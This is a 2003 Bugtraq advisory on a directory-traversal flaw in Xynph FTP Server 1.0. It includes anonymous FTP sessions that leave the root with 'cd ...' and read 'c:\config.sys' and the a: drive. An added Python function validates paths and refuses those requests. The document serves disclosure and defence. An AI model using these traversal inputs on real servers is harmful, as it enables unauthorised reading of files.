The OpenNET Project
 


Vulnerabilities in Xynph FTP Server 1.0


Date: Sat, 11 Jan 2003 22:52:32 +0800
From: "Zero-X www.lobnan.de Team" <zero-x@linuxmail.org>
To: bugtraq@securityfocus.com
Subject: Vulnerabilities in Xynph FTP Server 1.0

Vulnerabilities in Xynph FTP Server 1.0


Xynph FTP Server allows Directory Traversal

Example:
#######################################################
Verbindung mit zero-x.
220 Herzlich Willkommen!
<-Xynph FTP-Server->
Benutzer (zero-x:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> pwd
257 "C:/Temp/" is current directory.
Ftp> cd ..
501 CWD failed. No permission
Ftp> cd ...
250 CWD command successful. "C:/Temp/.../" is current directory.
Ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 .
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 ..
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Programme
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 command.com
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Autoexec.bat
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 config.sys
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Windows
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Cygwin
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Top-Secret
226 File sent ok
Ftp: 31337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
Ftp> get config.sys
200 Port command successful.
150 Opening data connection for config.sys.
226 File sent ok
Ftp: 1337 Bytes empfangen in 0.06Sekunden 2.92KB/Sek.
Ftp>
#######################################################


and you can read all drives.

Example:
#######################################################
Ftp> open zero-x
Verbindung mit zero-x.
220 Herzlich Willkommen!
<-Xynph FTP-Server->
Benutzer (zero-x:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> get c:\config.sys
200 Port command successful.
150 Opening data connection for c:\config.sys.
226 File sent ok
Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
Ftp> dir a:\
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw-   1 ftp      ftp       305113 Dec 15  2002 1.jpg
-rw-rw-rw-   1 ftp      ftp       313497 Dec 15  2002 4.jpg
-rw-rw-rw-   1 ftp      ftp       326046 Dec 15  2002 2.jpg
-rw-rw-rw-   1 ftp      ftp       357910 Dec 15  2002 3.jpg
226 File sent ok
Ftp: 31337 Bytes empfangen in 0.00Sekunden 244000.00KB/Sek.
Ftp>
#######################################################

~~ Zero X, member of www.lobnan.de ~~

Greets to:

www.lobnan.de (my Team)
www.he-crew.de
www.es-crew.de
www.bhc-security.de
www.dcw-group.net
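
A server-side path check that refuses the three requests shown in the sessions above (`cd ...`, `get c:\config.sys`, `dir a:\`), as an added example that is not part of the original advisory and is not Xynph code. The names `resolve_in_root` and `PathRejected` are hypothetical, and the sketch assumes the server keeps a virtual working directory per session and maps it onto a Windows root such as `C:/Temp/`.

```python
import ntpath  # Windows path rules, usable on any OS (pure string handling)


class PathRejected(Exception):
    """Raised when a client-supplied FTP path would leave the FTP root."""


def resolve_in_root(root, cwd, requested):
    """Map a client path (CWD/RETR/LIST argument) to a path inside `root`.

    root      -- directory the FTP user is confined to, e.g. C:/Temp/
    cwd       -- current directory as the client sees it, e.g. "/" or "/pub"
    requested -- raw argument sent by the client
    """
    req = requested.replace("\\", "/")
    # A drive letter or UNC prefix (c:\config.sys, a:\) is never a virtual path.
    drive, _ = ntpath.splitdrive(requested)
    if drive or req.startswith("//"):
        raise PathRejected("drive or UNC prefix: %r" % requested)
    # Absolute virtual paths start at the FTP root, relative ones at cwd.
    parts = [] if req.startswith("/") else [p for p in cwd.split("/") if p]
    for comp in req.split("/"):
        if comp in ("", "."):
            continue
        # Windows drops trailing dots and spaces from names, and older Windows
        # versions resolved "..." as the grandparent directory, so a component
        # made only of dots/spaces is refused unless it is exactly "..".
        if comp != ".." and comp.rstrip(". ") == "":
            raise PathRejected("dot-only component: %r" % comp)
        # A colon would name a drive or an NTFS alternate data stream.
        if ":" in comp:
            raise PathRejected("colon in component: %r" % comp)
        if comp == "..":
            if not parts:
                raise PathRejected("'..' above the FTP root")
            parts.pop()
        else:
            parts.append(comp)
    full = ntpath.normpath(ntpath.join(root, *parts))
    # Final containment check on the normalised result (case-insensitive).
    base = ntpath.normcase(ntpath.normpath(root))
    cand = ntpath.normcase(full)
    if cand != base and not cand.startswith(base.rstrip("\\") + "\\"):
        raise PathRejected("resolved outside root: %r" % full)
    return full
```

The check works on the virtual path before anything is handed to the filesystem, so the decision does not depend on how the underlying OS interprets `...`.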
